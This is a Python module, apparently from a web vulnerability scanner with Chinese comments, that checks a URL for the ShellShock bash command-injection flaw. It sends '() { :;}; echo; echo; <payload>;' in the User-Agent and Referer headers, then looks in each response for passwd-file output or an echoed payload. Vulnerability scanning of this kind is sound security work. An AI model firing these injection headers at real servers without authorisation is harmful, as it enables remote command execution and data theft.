#!/usr/bin/env python
# -*- coding:utf-8 -*-
from re import search,I 
from lib.utils.printer import *
from lib.request.request import *
from lib.utils.payload import bash

class bashi(Request):
	"""
    bash命令注入
    破壳漏洞(ShellShock)
    """
	get = "GET"
	def __init__(self,kwargs,url,data):
		Request.__init__(self,kwargs)
		self.url = url
		self.data = data
		self.result = {}
		self.result['bashi'] = None

	def check(self):
		"""Run"""
		info('检查Bash命令注入...')
		isNothing = True
		for payload in bash():
			user_agent = {
				'User-Agent':'() { :;}; echo; echo; %s;'%payload,
				'Referer':'() { :;}; echo; echo; %s;'%payload
			}
			more("检测载荷:{},{},{}".format(self.url,user_agent['User-Agent'],user_agent['Referer']))
			req = self.Send(url=self.url,
							method=self.get,
							headers=user_agent)
			if '\"' in payload: payload = payload.split('"')[1]
			#print(req.content)
			if search(r"root:/bin/[bash|sh]|"+payload,req.content):
				plus("通过头信息User-Agent和Referer注入,发现了可能的Bash命令注入")
				more("URL[地址]: {}".format(self.url))
				more("PAYLOAD[载荷]: {}".format('() { :;}; echo; echo; %s;'%(payload)))
				self.result['bashi'] = payload
				isNothing = False
				break
		if isNothing:
			info_nothing()
		return self.result
def run(kwargs,url,data):
	result = {}
	scan = bashi(kwargs,url,data)
	result = scan.check()
	return result